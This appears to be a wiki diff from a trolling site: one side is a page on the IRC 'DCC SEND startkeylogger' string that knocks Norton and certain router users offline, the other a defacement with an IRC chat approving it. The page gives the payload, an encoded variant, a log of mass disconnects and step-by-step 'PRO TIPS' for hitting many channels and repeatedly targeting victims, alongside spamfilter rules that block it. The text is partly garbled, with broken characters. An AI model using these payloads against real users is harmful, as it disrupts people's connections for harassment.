|
|
Line 1: |
Line 1: |
| The phrase '''�DCC SEND startkeylogger 0 0 0''' (that's a \x01 character in front) is frequently used by [[h4x0r]]s on [[IRC]] to make Norton and some retarded Linksys / Netgear routers [[Scat|shit on the connection]]. It had highly [[E-drama|dramatic effects]], causing pricks who use Norton or shitty Linksys/Netgear routers to drop off the face of the [[internets]], often flooding the channel with spam. It only needs to be �DCC SEND (14+ chrs) See: [http://www.hm2k.com/articles/startkeylogger/ startkeylogger]
| | brutally defaced your page |
| ==Example==
| |
| This is what it looks like when a [[H4x0r]] unleashes his vagina powers upon the IRC channel:
| |
| <pre>
| |
| [15:07:44] <Fail-chan> DCC SEND "startkeylogger" 0 0 0
| |
| [15:07:44] * oneszero has quit (Read error: Connection reset by peer)
| |
| [15:07:44] * billspork has quit (Read error: Connection reset by peer)
| |
| [15:07:44] * cynistyr- has quit (Read error: Connection reset by peer)
| |
| [15:07:44] * AudioVENT has quit (Read error: Connection reset by peer)
| |
| [15:07:44] * mikel has quit (Read error: Connection reset by peer)
| |
| [15:07:44] * Crispy` has quit (Read error: Connection reset by peer)
| |
| [15:07:44] * ste_ has quit (Read error: Connection reset by peer)
| |
| [15:07:44] * tzennator has quit (Read error 54: Connection reset by peer)
| |
| [15:07:44] * Short has quit (Read error: Connection reset by peer)
| |
| [15:07:44] * RedXIII has quit (Read error: Connection reset by peer)
| |
| [15:07:44] * Urkav has quit (Read error: Connection reset by peer)
| |
| [15:07:44] * mflynn00 has quit (Read error: Connection reset by peer)
| |
| [15:07:44] * SicdoggV has quit (Read error: Connection reset by peer)
| |
| [15:07:45] * HyPn0m0D has quit (Read error: Connection reset by peer)
| |
| [15:07:45] * lonequid has quit (Read error: Connection reset by peer)
| |
| [15:07:45] * MytSouriS has quit (Read error: Connection reset by peer)
| |
| [15:07:45] * Furious_G has quit (Read error: Connection reset by peer)
| |
| [15:07:45] * ChunkeyMo has quit (Read error: Connection reset by peer)
| |
| [15:07:45] * Antizac has quit (Read error: Operation timed out)
| |
| </pre>
| |
|
| |
|
| Another example is [http://paste.ubuntu.com/787337/ here]. Wonder why this bug still exists in 2011, eh?
| |
|
| |
|
| You can also encode things between the "s to effect more people. Posted below, but not shown correctly due to wiki fail.
| | - master hacker |
|
| |
|
| <pre>??�DCC SEND "ff???f?ð‘¹ð‘°ð‘·ð‘³ð‘¶ð‘³ð‘ºð‘¼ð‘·ð‘®ð‘¼ð’€ð‘º" 0 0 0</pre> | | 05:20:22 <~zee> Scootaloo: if I find a website |
| | | 05:20:24 <~zee> that belongs to you |
| ==Stopping this shit==
| | 05:20:26 <~zee> can I deface it? |
| To make the exploit less effective on your IRC experience, buy a new router or connect to the IRC server using SSL.
| | 05:20:33 <~Scootaloo> zee: ok |
| The latter also prevents [[FBI|eavesdropping]] on your connection.
| | 05:20:33 <~LOLBOAT> lol |
| ==PRO TIPS==
| | 05:20:34 <~Scootaloo> u can deface |
| To maximize the drama, follow these steps:
| | 05:20:37 <~Scootaloo> encyclopediadramatica.se |
| | |
| #Connect to an IRC Network
| |
| #/list all Channels with more than 50 members and join all of them
| |
| #/amsg �DCC SEND startkeylogger 0 0 0 or any other command that causes your client to send a message to all channels
| |
| #You will probably get kicked from most chans. Write down the nicks of those who got pwnt.
| |
| #Convert these names into a script that sends each of them message, containing the evil words
| |
| #Give them some time to reconnect, then execute your script
| |
| #Execute previous step until you get banned from the network.
| |
| #???
| |
| #PROFIT
| |
| | |
| Alternatively you can make this your wireless network id to annoy people within your general vicinity.
| |
| | |
| ==[[Lulzkiller|Filtering this from your network]]==
| |
| I've thrown together some quick and dirty UnrealIRCd spamfilter commands to help deal with these exploits. Refinements and improvements welcome! | |
| | |
| <pre> | |
| /spamfilter + cpnNPqat block - norton_firewall_exploit startkeylogger
| |
| /spamfilter + cpnNPqat block - norton_firewall_exploit stopkeylogger
| |
| /spamfilter + cpNPqat block - linksys_netgear_exploit ^DCC SEND ..............
| |
| </pre> | |
| (The last one has 14 dots at the end of the pattern.)
| |
| | |
| If you want to add these to your config file, use
| |
| <pre> | |
| spamfilter {
| |
| regex "^DCC SEND ..............";
| |
| target { channel; private; private-notice; part; quit; away; topic; };
| |
| action block;
| |
| reason "linksys netgear exploit";
| |
| };
| |
| spamfilter {
| |
| regex "startkeylogger";
| |
| target { channel; private; private-notice; part; quit; away; topic; private-notice; };
| |
| action block;
| |
| reason "norton firewall exploit";
| |
| };
| |
| </pre> | |
| | |
| ==External Links==
| |
| *[http://www.hm2k.com/articles/startkeylogger "explains it better"]
| |
| | |
| {{Trolls}}
| |
| {{ircseries}}
| |
| | |
| [[Category:Drama-generating techniques]]
| |
brutally defaced your page
- master hacker
05:20:22 <~zee> Scootaloo: if I find a website
05:20:24 <~zee> that belongs to you
05:20:26 <~zee> can I deface it?
05:20:33 <~Scootaloo> zee: ok
05:20:33 <~LOLBOAT> lol
05:20:34 <~Scootaloo> u can deface
05:20:37 <~Scootaloo> encyclopediadramatica.se